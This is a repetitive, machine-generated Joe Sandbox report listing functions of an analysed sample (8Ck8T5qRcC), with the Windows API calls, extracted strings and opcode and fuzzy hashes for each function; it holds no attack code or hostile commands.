Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63bb808164e5983d486f494eddd634a9007d7b510583fa9545a44e81dcf9d457
Instruction ID: 38815c32575596b0a379d943f8f3c487d85880dbfc06f971c0b4b7f63979260b
Opcode Fuzzy Hash: 63bb808164e5983d486f494eddd634a9007d7b510583fa9545a44e81dcf9d457
Instruction Fuzzy Hash: 3FA001D62E9202FC3209A3A5AD2AEFB1A9EE4C0B25730996EF586D5481A9816C4A5031

Function 00DB0A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 395b543e85e13b46dac9088c691c48d45cd8c1dbd8f768e40f1b322280eda8af
Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
Opcode Fuzzy Hash: 395b543e85e13b46dac9088c691c48d45cd8c1dbd8f768e40f1b322280eda8af
Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030

Function 00DB0A7F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa2c74629f91321e5d9df6dcc8cf94e4311f09105b34a1ffa3854b7c36f369f4
Instruction ID: f3d91c39fb9e2d2cfc01da3afdcece477c6827d24a6f1389d089030e9317ba03
Opcode Fuzzy Hash: fa2c74629f91321e5d9df6dcc8cf94e4311f09105b34a1ffa3854b7c36f369f4
Instruction Fuzzy Hash: 9AA001D62E9202FC320963A5AD26DFB1A5EE4C4B657309D6EF487C5481A9816C4A5031

Function 00DB0A6B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bfdabd67726db5bed5ee28db95863104a5db8a188c353e2b97a8b8a00824e158
Instruction ID: f3d91c39fb9e2d2cfc01da3afdcece477c6827d24a6f1389d089030e9317ba03
Opcode Fuzzy Hash: bfdabd67726db5bed5ee28db95863104a5db8a188c353e2b97a8b8a00824e158
Instruction Fuzzy Hash: 9AA001D62E9202FC320963A5AD26DFB1A5EE4C4B657309D6EF487C5481A9816C4A5031

Function 00DB0A1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 57bc0bfe038a917e5d8eb89ac13ab49abc06264b6cbfa1c89b0c08ac07f02b73
Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
Opcode Fuzzy Hash: 57bc0bfe038a917e5d8eb89ac13ab49abc06264b6cbfa1c89b0c08ac07f02b73
Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030

Function 00DB0A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c89fc5990e518fc09c2e41d0a4e0c79557485f813cd5e6dfd7b082f31cffc981
Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
Opcode Fuzzy Hash: c89fc5990e518fc09c2e41d0a4e0c79557485f813cd5e6dfd7b082f31cffc981
Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030

Function 00DB0A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c022d574d6e64ec4424698b16ade5715ee85ce25ca7a7161a5a77c2e39f6eae
Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
Opcode Fuzzy Hash: 0c022d574d6e64ec4424698b16ade5715ee85ce25ca7a7161a5a77c2e39f6eae
Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030

Function 00D9B949 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00D9A712,?,?,?,?,?,?,?), ref: 00D9B94C

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 996e043dafc6b846139073ebb3450ee35f67f2c53b722a193e77ca6e1bf5659b
Instruction ID: 5135082f76b834f2776307c0917860b9cb418422d4683e7a5a09775414a024e2
Opcode Fuzzy Hash: 996e043dafc6b846139073ebb3450ee35f67f2c53b722a193e77ca6e1bf5659b
Instruction Fuzzy Hash: 7AA0223008000F8BCE002B30CE0880C3B20FB20BC030002E8A00BCF0B2CB23C80BEB20

Function 00DACBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 00DACBBA

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 4c0552ffd08518e0b8807e77aa6af7daa056751463893f5c076374679fb68603
Instruction ID: 6d08b6c545f7d82c8179db204df472c3badad0f4dfac18d9dae3ac02bb06dc85
Opcode Fuzzy Hash: 4c0552ffd08518e0b8807e77aa6af7daa056751463893f5c076374679fb68603
Instruction Fuzzy Hash: 54A012301003028782000B318F0590E76556F51A01F04C0346001C0130C731C820A510

Non-executed Functions

Function 00DAE560 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 240windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DAE602
EndDialog.USER32(?,00000006), ref: 00DAE615
GetDlgItem.USER32(?,0000006C), ref: 00DAE631
SetFocus.USER32(00000000), ref: 00DAE638
SetDlgItemTextW.USER32(?,00000065,?), ref: 00DAE66C
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DAE69F
FindFirstFileW.KERNEL32(?,?), ref: 00DAE6B5

Part of subcall function 00DACBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACBEE
Part of subcall function 00DACBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DACC05
Part of subcall function 00DACBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DACC19
Part of subcall function 00DACBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACC2A
Part of subcall function 00DACBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DACC42
Part of subcall function 00DACBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00DACC66
Part of subcall function 00DACBC8: _swprintf.LIBCMT ref: 00DACC85

_swprintf.LIBCMT ref: 00DAE704

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DAE717
FindClose.KERNEL32(00000000), ref: 00DAE71E
_swprintf.LIBCMT ref: 00DAE773
SetDlgItemTextW.USER32(?,00000068,?), ref: 00DAE786
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DAE7A0
_swprintf.LIBCMT ref: 00DAE7D9
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DAE7EC
_swprintf.LIBCMT ref: 00DAE83C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00DAE84F

Part of subcall function 00DAD0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DAD0E1
Part of subcall function 00DAD0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,00DD272C,?,?), ref: 00DAD12A

Strings

%s %s, xrefs: 00DAE6F1, 00DAE6FD, 00DAE769, 00DAE7CF, 00DAE832
REPLACEFILEDLG, xrefs: 00DAE59C

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
String ID: %s %s$REPLACEFILEDLG
API String ID: 3464475507-439456425
Opcode ID: cf21ebda49af94f2b7952c89803c524082824d324d87ac03ac95ab70ae77028c
Instruction ID: 7ca783a23ff0ad9393004935299868f66e2cfb0da1431045ad1b1bf22b51f0ef
Opcode Fuzzy Hash: cf21ebda49af94f2b7952c89803c524082824d324d87ac03ac95ab70ae77028c
Instruction Fuzzy Hash: 1E719372649344BBE331AB64EC49FFF77ADEB8A700F040819F649D6181DA759904CB72

Function 00D97FD3 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 365fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D9807F
_wcslen.LIBCMT ref: 00D98112

Part of subcall function 00D98C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D98CB2
Part of subcall function 00D98C95: GetLastError.KERNEL32 ref: 00D98CF6
Part of subcall function 00D98C95: CloseHandle.KERNEL32(?), ref: 00D98D05

Part of subcall function 00D9BC65: DeleteFileW.KERNELBASE(?,?,?,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9BC82
Part of subcall function 00D9BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?), ref: 00D9BCAE

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D981C1
CloseHandle.KERNEL32(00000000), ref: 00D981DD
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,E7604376,00000000), ref: 00D98329

Part of subcall function 00D9B7E2: FlushFileBuffers.KERNEL32(?), ref: 00D9B7FC
Part of subcall function 00D9B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D9B8B0

Part of subcall function 00D9AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,00D9AF75,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9AFEB

Part of subcall function 00D9C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00D9BF5E,?,?), ref: 00D9C305
Part of subcall function 00D9C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D9BF5E,?,?), ref: 00D9C334

Strings

\??\, xrefs: 00D980A1
SeRestorePrivilege, xrefs: 00D98034
vC`, xrefs: 00D98004
SeCreateSymbolicLinkPrivilege, xrefs: 00D9803E
UNC\, xrefs: 00D980D2

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\$vC`
API String ID: 243576179-37205834
Opcode ID: 0ee9d76516cadb53b3bb3d20ebc691c88a0ea39251f694b6f919bcb3603304d8
Instruction ID: a790cd770d92a5d551fd5ebecac5778fc45ce3251a03a33380dac8cf61708b99
Opcode Fuzzy Hash: 0ee9d76516cadb53b3bb3d20ebc691c88a0ea39251f694b6f919bcb3603304d8
Instruction Fuzzy Hash: 7DD170B1900249AFDF21DFA4DC41BEEB7A8FF05700F04451AFA46E7281DB74AA449BB0

Function 00DBFF3E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00DC0084

Strings

1#QNAN, xrefs: 00DC128A
1#IND, xrefs: 00DC127C
1#SNAN, xrefs: 00DC1283
1#INF, xrefs: 00DC1291

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c51013501ff45093cdfda70de127c3c12f5d2acf99f0a13dbb08017025632f5f
Instruction ID: c8ab21493b54f00454431877f7b512468a853ce6dfccb6baef862ebd0a3b1e27
Opcode Fuzzy Hash: c51013501ff45093cdfda70de127c3c12f5d2acf99f0a13dbb08017025632f5f
Instruction Fuzzy Hash: 2FC22871E0862ACFDB25CE289D40BEAB7B5EB45304F1841EED44DE7241E775AE818F60

Function 00D93AB7 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 677COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D93F3A

Strings

CMT, xrefs: 00D94288
hc%u, xrefs: 00D93F80
h%u, xrefs: 00D93F2C

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _swprintf
String ID: CMT$h%u$hc%u
API String ID: 589789837-3282847064
Opcode ID: 96277a7dbd2fc884aeed13fc1db95441dbac7339764d0a779d993622f3cd7002
Instruction ID: de79b7dafe1f2d06c73b2719436631982c8f7a200f17591da221d6d351ba7e5f
Opcode Fuzzy Hash: 96277a7dbd2fc884aeed13fc1db95441dbac7339764d0a779d993622f3cd7002
Instruction Fuzzy Hash: 4B42C231A05245ABDF24DF74C895BEE7BA5EF15300F080479F84A9B287DB70AA49CB71

Function 00D92FCB Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 830COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00D935C3

Part of subcall function 00DA3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,00000001,00D9DA04,00000000,?,?,0001040E,?,?), ref: 00DA3D2C

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D9370D

Strings

CMT, xrefs: 00D93738

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1610651222-2756464174
Opcode ID: 00b562bbb528c4898360ad368eb3ed00b73c3385b93e076df1f6aae710b7e047
Instruction ID: 5e0b290760b36d667974e3c9a9a2ba6159e269b171be2f5e4dbf74eba1e50071
Opcode Fuzzy Hash: 00b562bbb528c4898360ad368eb3ed00b73c3385b93e076df1f6aae710b7e047
Instruction Fuzzy Hash: 11620471A002949FCF19DF78C8956EE7BF1EF15304F08057EE88A9B282DA749A45CB71

Function 00DB1FCA Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DB1FD6
IsDebuggerPresent.KERNEL32 ref: 00DB20A2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DB20C2
UnhandledExceptionFilter.KERNEL32(?), ref: 00DB20CC

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5260fd75b11dfde4d60c337bd1f54b8c2d8f961ef65dabae157cb77f0e0d999d
Instruction ID: 362b50dfac774dbedc2dcc4bbe9fd389d066a0b26ba967c303bed59fe761da88
Opcode Fuzzy Hash: 5260fd75b11dfde4d60c337bd1f54b8c2d8f961ef65dabae157cb77f0e0d999d
